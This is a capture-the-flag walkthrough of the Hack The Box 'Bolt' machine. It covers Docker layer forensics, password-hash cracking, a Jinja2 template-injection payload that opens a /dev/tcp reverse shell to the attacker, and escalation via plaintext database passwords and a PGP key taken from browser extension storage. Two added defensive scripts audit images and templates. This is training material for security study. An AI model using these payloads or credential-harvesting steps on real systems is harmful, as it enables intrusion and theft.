[Hack The Box] HTB—Bolt walkthrough
I kept putting this off; once the box is retired I can just crib from the walkthrough.
HTB—Bolt
Official walkthrough: https://app.hackthebox.com/machines/Bolt/walkthroughs
I. Information gathering
1.Ports
nmap
nmap -sV 10.10.11.114
Deeper scan of the open ports
nmap -sC -sV -n -T5 -p 22,80,443 10.10.11.114 -oN PortsDepth.txt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)
| 256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)
|_ 256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Starter Website - About
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2021-02-24T19:11:23
|_Not valid after: 2022-02-24T19:11:23
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The SSL certificate on port 443 has the common name commonName=passbolt.bolt.htb
The Common Name (AKA CN) represents the server name protected by the SSL certificate. The certificate is valid only if the request hostname matches the certificate common name. Most web browsers display a warning message when connecting to an address that does not match the common name in the certificate.
Edit the hosts file and add both domain names
10.10.11.114 bolt.htb
10.10.11.114 passbolt.bolt.htb
Passbolt | Open source password manager for teams
Starter Website - About (bolt.htb)
2.vhosts
Scan for subdomains (I also tried ffuf, but gobuster felt a bit easier to use)
gobuster vhost -w /usr/share/dnsrecon/subdomains-top1mil.txt -u http://bolt.htb/
This finds two more subdomains
Found: mail.bolt.htb (Status: 200) [Size: 4943]
Found: demo.bolt.htb (Status: 302) [Size: 219]
http://mail.bolt.htb/
http://demo.bolt.htb/
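II. Web penetration
Port 80 is Bolt CMS, which has a command execution vulnerability, but it requires a user account (I later found out it is not Bolt CMS at all...)
Registration failed, and brute-forcing the admin user did not succeed
1.Docker analysis
Browsing the home page turns up a download option; download the image
Load and run the Docker image image.tar
docker load --input image.tar
docker images   # list images
# flask-dashboard-adminlte_appseed-app latest 859e74798e6c 11 months ago 154MB
docker run -itd 859e74798e6c   # run the image
docker exec -it 623ea34 /bin/sh   # enter the container
The site files are under /app; copy them out with the cp command
docker cp 623ea347a31f:app ./app
Add run.py and the configuration file config.py from the root directory, then take a quick look at the source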
2.Source code audit
config.py
import os
from decouple import config
class Config(object):
    basedir = os.path.abspath(os.path.dirname(__file__))
    # Set up the App SECRET_KEY
    SECRET_KEY = config('SECRET_KEY', default='S#perS3crEt_007')
    # This will create a file in <app> FOLDER
    SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'db.sqlite3')
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    MAIL_SERVER = 'localhost'
    MAIL_PORT = 25
    MAIL_USE_TLS = False
    MAIL_USE_SSL = False
    MAIL_USERNAME = None
    MAIL_PASSWORD = None
    DEFAULT_MAIL_SENDER = 'support@bolt.htb'
class ProductionConfig(Config):
    DEBUG = False
    # Security
    SESSION_COOKIE_HTTPONLY = True
    REMEMBER_COOKIE_HTTPONLY = True
    REMEMBER_COOKIE_DURATION = 3600
    # PostgreSQL database
    SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(
        config( 'DB_ENGINE' , default='postgresql' ),
        config( 'DB_USERNAME' , default='appseed' ),
        config( 'DB_PASS' , default='pass' ),
        config( 'DB_HOST' , default='localhost' ),
        config( 'DB_PORT' , default=5432 ),
        config( 'DB_NAME' , default='appseed-flask' )
    )
class DebugConfig(Config):
    DEBUG = True
# Load all possible configurations
config_dict = {
    'Production': ProductionConfig,
    'Debug' : DebugConfig
}
The format of SQLALCHEMY_DATABASE_URI makes it obvious that the app uses the flask_sqlalchemy or sqlalchemy library to connect to PostgreSQL
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'db.sqlite3')
postgresql://appseed:pass@localhost:5432/appseed-flask
However, the latest container I restored has no db.sqlite3; the file is in the a4ea layer
The SQLite database is not encrypted; export it and open it
admin $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.
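Added example (not from the original post or the Bolt image): deleting a file in a later image layer does not remove it from the layers below, which is why db.sqlite3 was still recoverable here. The sketch audits a `docker save` archive for sensitive files that are deleted or replaced in the final filesystem but still stored in a layer; the suffix watch-list, the function names and the two-layer sample archive are constructed assumptions.

```python
import io
import json
import posixpath
import tarfile

SENSITIVE = (".sqlite3", ".db", ".env", ".pem", ".key")  # assumed watch-list

def whiteout_target(path):
    parent, base = posixpath.split(path)
    if base == ".wh..wh..opq":       # opaque marker: hides the whole directory
        return parent
    if base.startswith(".wh."):      # whiteout: hides one file or directory
        return posixpath.join(parent, base[4:])
    return None                      # ordinary entry

def buried_files(image):
    """(layer, path) of sensitive files stored in a layer but gone from the final fs."""
    final, seen = {}, []             # final: path -> layer that provides it
    with tarfile.open(fileobj=io.BytesIO(image)) as outer:
        manifest = json.load(outer.extractfile("manifest.json"))
        for layer in manifest[0]["Layers"]:
            blob = io.BytesIO(outer.extractfile(layer).read())
            with tarfile.open(fileobj=blob) as inner:
                members = [(posixpath.normpath(m.name), m) for m in inner]
            for path, _ in members:  # apply this layer's deletions first
                gone = whiteout_target(path)
                if gone is not None:
                    prefix = gone + "/" if gone else ""
                    for p in [p for p in final if p == gone or p.startswith(prefix)]:
                        del final[p]
            for path, m in members:  # then record the files it adds
                if m.isfile() and whiteout_target(path) is None:
                    final[path] = layer
                    if path.endswith(SENSITIVE):
                        seen.append((layer, path))
    return [(layer, path) for layer, path in seen if final.get(path) != layer]

def make_tar(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as t:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            t.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def sample_image():
    """Constructed image: layer 2 deletes the database that layer 1 added."""
    l1 = make_tar({"app/run.py": b"print('hi')", "db.sqlite3": b"SQLite format 3\x00"})
    l2 = make_tar({".wh.db.sqlite3": b"", "app/config.py": b"DEBUG = False"})
    manifest = json.dumps([{"Layers": ["l1/layer.tar", "l2/layer.tar"]}]).encode()
    return make_tar({"manifest.json": manifest, "l1/layer.tar": l1, "l2/layer.tar": l2})

if __name__ == "__main__":
    print(buried_files(sample_image()))
```

Run against an image before publishing it, any hit means the file has to be kept out of the build entirely (or the image rebuilt), because a later delete only hides it.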
Now go back and look at how the password is hashed
app/base/routes.py
@blueprint.route('/login', methods=['GET', 'POST'])
def login():
    login_form = LoginForm(request.form)
    if 'login' in request.form:
        # read form data
        username = request.form['username']
        password = request.form['password']
        # Locate user
        user = User.query.filter_by(username=username).first()
        # Check the password
        stored_password = user.password
        stored_password = stored_password.decode('utf-8')
        if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):
            login_user(user)
            return redirect(url_for('base_blueprint.route_default'))
        # Something (user or pass) is not ok
        return render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)
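The check is compare_hash(stored_password,crypt.crypt(password,stored_password)). I later found that John the Ripper can identify the hash format and crack it, so there is no need to write a Python script!
john -w=/usr/share/wordlists/rockyou.txt admin.hash
The admin user's password
admin/deadbolt
Python script by a more experienced player
These credentials log in to http://bolt.htb/admin/home, but the main site has nothing exploitable
Logging in to mail.bolt.htb with the admin account returns an error, so try registering a new user on demo.bolt.htb
app\base\routes.py in layer
41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad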
@blueprint.route('/register', methods=['GET', 'POST'])
def register():
    login_form = LoginForm(request.form)
    create_account_form = CreateAccountForm(request.form)
    if 'register' in request.form:
        username = request.form['username']
        email = request.form['email' ]
        code = request.form['invite_code']
        if code != 'XNSS-HSJW-3NGU-8XTJ':
            return render_template('code-500.html')
        data = User.query.filter_by(email=email).first()
        if data is None and code == 'XNSS-HSJW-3NGU-8XTJ':
            # Check username exists
            user = User.query.filter_by(username=username).first()
            if user:
                return render_template( 'accounts/register.html',
                                        msg='Username already registered',
                                        success=False,
                                        form=create_account_form)
            # Check email exists
            user = User.query.filter_by(email=email).first()
            if user:
                return render_template( 'accounts/register.html',
                                        msg='Email already registered',
                                        success=False,
                                        form=create_account_form)
            # else we can create the user
            user = User(**request.form)
            db.session.add(user)
            db.session.commit()
            return render_template( 'accounts/register.html',
                                    msg='User created please <a href="/login">login</a>',
                                    success=True,
                                    form=create_account_form)
    else:
        return render_template( 'accounts/register.html', form=create_account_form)
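This gives the invite code: code == 'XNSS-HSJW-3NGU-8XTJ'
3.SSTI
After registering and logging in (I had seen earlier that it is Jinja2), search for render_template
to look for an SSTI vulnerability; look at this profile source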
@blueprint.route("/example-profile", methods=['GET', 'POST'])
@login_required
def profile():
    """Profiles"""
    if request.method == 'GET':
        return render_template('example-profile.html', user=user,current_user=current_user)
    else:
        """Experimental Feature"""
        cur_user = current_user
        user = current_user.username
        name = request.form['name']
        experience = request.form['experience']
        skills = request.form['skills']
        msg = Message(
            recipients=[f'{cur_user.email}'],
            sender = 'support@example.com',
            reply_to = 'support@example.com',
            subject = "Please confirm your profile changes"
        )
        try:
            cur_user.profile_update = name
        except:
            return render_template('page-500.html')
        db.session.add(current_user)
        db.session.commit()
        token = ts.dumps(user, salt='changes-confirm-key')
        confirm_url = url_for('home_blueprint.confirm_changes',token=token,_external=True)
        html = render_template('emails/confirm-changes.html',confirm_url=confirm_url)
        msg.html = html
        mail.send(msg)
        return render_template('index.html')
Changing the profile triggers the SSTI; the change has to be confirmed from the mailbox
@blueprint.route('/confirm/changes/<token>')
def confirm_changes(token):
    """Confirmation Token"""
    try:
        email = ts.loads(token, salt="changes-confirm-key", max_age=86400)
    except:
        abort(404)
    user = User.query.filter_by(username=email).first_or_404()
    name = user.profile_update
    template = open('templates/emails/update-name.html', 'r').read()
    msg = Message(
        recipients=[f'{user.email}'],
        sender = 'support@example.com',
        reply_to = 'support@example.com',
        subject = "Your profile changes have been confirmed."
    )
    msg.html = render_template_string(template % name)
    mail.send(msg)
Log in to mail.bolt.htb with the e-mail address entered at registration; msg.html = render_template_string(template % name)
confirms the SSTI
{{''.__class__.__mro__}}
#(<class 'str'>, <class 'object'>)
Look for usable references under object
{{''.__class__.__mro__[1].__subclasses__()}}
# <class 'os._wrap_close'> is number 129
{{"".__class__.__bases__[0].__subclasses__()[129].__init__.__globals__['popen']('whoami').read()}}
//this payload does not work
//found this one, the url_for() method created by Jinja2
{{url_for.__globals__.os.popen("whoami").read()}}
//reverse shell
{{url_for.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.9/4444 0>&1"').read()}}
nc -lvvp 4444
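Added example (not code from the original post or from the application): the root cause is that `template % name` places user input into the template source before `render_template_string` compiles it, whereas passing the value as a context variable (with a `{{ name }}` placeholder in the template, which is an assumption about the fixed template) keeps it as data. The checker below flags template-compiling calls whose first argument is assembled at runtime; the sink list, function names and sample source are constructed, and the variable tracking is a simple heuristic that ignores scope.

```python
import ast

SINKS = {"render_template_string", "from_string", "Template"}  # assumed sink list

def how_built(expr, tainted):
    """Name how a template string is assembled at runtime, or None if it is not."""
    if isinstance(expr, ast.BinOp) and isinstance(expr.op, ast.Mod):
        return "%-formatting"
    if isinstance(expr, ast.BinOp) and isinstance(expr.op, ast.Add):
        return "concatenation"
    if isinstance(expr, ast.JoinedStr) and any(
            isinstance(v, ast.FormattedValue) for v in expr.values):
        return "f-string"
    if (isinstance(expr, ast.Call) and isinstance(expr.func, ast.Attribute)
            and expr.func.attr == "format"):
        return "str.format"
    if isinstance(expr, ast.Name) and expr.id in tainted:
        return f"variable built by {tainted[expr.id]}"
    return None

def dynamic_templates(source):
    """Return sorted (line, sink, reason) for sinks fed a runtime-built template."""
    tree = ast.parse(source)
    tainted = {}
    for node in ast.walk(tree):          # pass 1: variables holding built strings
        if isinstance(node, ast.Assign) and how_built(node.value, {}):
            for target in node.targets:
                if isinstance(target, ast.Name):
                    tainted[target.id] = how_built(node.value, {})
    findings = []
    for node in ast.walk(tree):          # pass 2: sinks that receive them
        if isinstance(node, ast.Call) and node.args:
            f = node.func
            name = f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", None)
            reason = how_built(node.args[0], tainted)
            if name in SINKS and reason:
                findings.append((node.lineno, name, reason))
    return sorted(findings)

# Constructed sample: the page's pattern, a one-hop variant, and the safe form.
SAMPLE = '''
def confirm_changes(user, msg):
    template = open('templates/emails/update-name.html').read()
    msg.html = render_template_string(template % user.profile_update)
def confirm_changes_var(user, msg):
    body = "<p>Hello " + user.profile_update + "</p>"
    msg.html = render_template_string(body)
def confirm_changes_fixed(user, msg):
    template = open('templates/emails/update-name.html').read()
    msg.html = render_template_string(template, name=user.profile_update)
'''

if __name__ == "__main__":
    print(dynamic_templates(SAMPLE))
```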
III. Privilege escalation
1.Find a password and log in as eddie
List the users that can log in / have privileges
cat /etc/passwd|grep -v nologin |grep -v false
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash
clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash
Connect to the database and see whether it holds information about other users
www-data@bolt:~/demo$ cat config.py
cat config.py
"""Flask Configuration"""
#SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
SQLALCHEMY_DATABASE_URI = 'mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'kreepandcybergeek'
MAIL_SERVER = 'localhost'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
#MAIL_DEBUG = app.debug
MAIL_USERNAME = None
MAIL_PASSWORD = None
DEFAULT_MAIL_SENDER = 'support@bolt.htb'
mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail
bolt_dba/dXUUHSW9vBpH5qRB
mysql -ubolt_dba -pdXUUHSW9vBpH5qRB
use boltmail;
show tables; # user
select * from user;
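The current user lacks the privileges to read the mysql database, and the boltmail database has nothing I need
Then I was stuck; the walkthrough says to search for files by owner: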
find /etc -user www-data 2>/dev/null
# /etc/passbolt/Seeds
/etc/passbolt/passbolt.php
contains a password: rT2;jW7<eY8!dX8}pQ8%
along with the following database information:
// Database configuration.
'Datasources' => [
    'default' => [
        'host' => 'localhost',
        'port' => '3306',
        'username' => 'passbolt',
        'password' => 'rT2;jW7<eY8!dX8}pQ8%',
        'database' => 'passboltdb',
    ],
],
Connect
mysql --user=passbolt --password='rT2;jW7<eY8!dX8}pQ8%' --database=passboltdb
show tables;
# two tables are worth a look: users and secrets
account_settings
action_logs
actions
authentication_tokens
avatars
comments
email_queue
entities_history
favorites
gpgkeys
groups
groups_users
organization_settings
permissions
permissions_history
phinxlog
profiles
resource_types
resources
roles
secret_accesses
secrets
secrets_history
user_agents
users
select * from secrets; //the output is truncated
select * from users;
select * from secrets\G //appending \G to a MySQL statement prints the result vertically, so that each field is printed on its own line.
secret
*************************** 1. row ***************************
id: 643a8b12-c42c-4507-8646-2f8712af88f8
user_id: 4e184ee6-e436-47fb-91c9-dccb57f250bc
resource_id: cd0270db-c83f-4f44-b7ac-76609b397746
data: -----BEGIN PGP MESSAGE-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org
-----END PGP MESSAGE-----
created: 2021-02-25 21:50:11
modified: 2021-03-06 15:34:36
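In fact, the password we obtained earlier is also the eddie user's password
eddie/rT2;jW7<eY8!dX8}pQ8%
Switch user
su - eddie
python3 -c 'import pty;pty.spawn("/bin/bash")'
eddie's home directory contains user.txt, which should be a flag as well
2.eddie private key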
find /var -user eddie 2>/dev/null
# /var/mail/eddie
cd /var/mail
ls
# eddie none root www-data xiaoz
Read the mail
eddie@bolt:/var/mail$ cat eddie
From clark@bolt.htb Thu Feb 25 14:20:19 2021
Return-Path: <clark@bolt.htb>
X-Original-To: eddie@bolt.htb
Delivered-To: eddie@bolt.htb
Received: by bolt.htb (Postfix, from userid 1001)
id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)
Subject: Important!
To: <eddie@bolt.htb>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20210225212019.DFF264CD@bolt.htb>
Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)
From: Clark Griswold <clark@bolt.htb>
Hey Eddie,
The password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I CANNOT recover it. Your private key is the only way to recover your account.
Once you're set up you can start importing your passwords. Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...
-Clark
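So the thing to look for is the private key ("Your private key is the only way to recover your account.");
combined with the secret obtained from the database earlier, it should be a PGP private key
Pretty Good Privacy (PGP) is a security protocol based on a web of trust
OpenPGP
In 1997, PGP became an Internet standard called OpenPGP. Many e-mail systems support OpenPGP. In practice, the PGP web-of-trust idea fits the nature of e-mail very well. In 2007, the PGP protocol was updated with respect to its encryption algorithms, and support for algorithms such as Camellia, ECDSA, ECDH and EdDSA was added later.
GPG
GNU Privacy Guard (GnuPG or GPG) is encryption software, a GPL-compliant replacement for the PGP encryption software. GnuPG is designed according to the OpenPGP technical standard set by the IETF. GnuPG is used for encryption, digital signatures and generating asymmetric key pairs.
("Go ahead and download the extension to your browser and get logged in."
The private key may be in the browser cache.) Look for the private key under the home directory
Chrome data path: ~/.config/google-chrome/Default
Firefox data paths: ~/Library/Mozilla/Firefox/Profiles/xxxxxxxx.default/
~/Library/Application Support/Mozilla/Firefox/Profiles/xxxxxxxx.default/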
grep -r 'BEGIN PGP PRIVATE KEY' ~
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js:const PRIVATE_HEADER = '-----BEGIN PGP PRIVATE KEY BLOCK-----';
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js: // BEGIN PGP PRIVATE KEY BLOCK
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js: result.push("-----BEGIN PGP PRIVATE KEY BLOCK-----\r\n");
Binary file /home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log matches
Filter out the block that matches the private-key format
strings '/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log' | grep -oP '\-\-\-\-\-BEGIN PGP PRIVATE [\s\S]*?END PGP PRIVATE KEY BLOCK\-\-\-\-\-' | head -1
strings '/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js' | grep -oP '\-\-\-\-\-BEGIN PGP PRIVATE [\s\S]*?END PGP PRIVATE KEY BLOCK\-\-\-\-\-' | head -1
This yields the private key
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org
-----END PGP PRIVATE KEY BLOCK-----
3.PGP decryption
A PGP private key is usually protected with a password; use gpg2john to compute the hash and crack it with john
gpg2john.exe pgp.txt > hash
john.exe hash
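Password: merrychristmas
Use an online tool (PGP Tool - online PGP key generator, encryption and decryption tool (pgptool.org)) to decrypt the encrypted PGP message obtained from the database earlier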
{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}
This gives root's secret; switch user
Got the flag 4a1c94ec439b2a1c143f228b6114155a
Reference walkthrough:
[HTB Series] Bolt l [ChengYing Security Team, ChengYingTeam]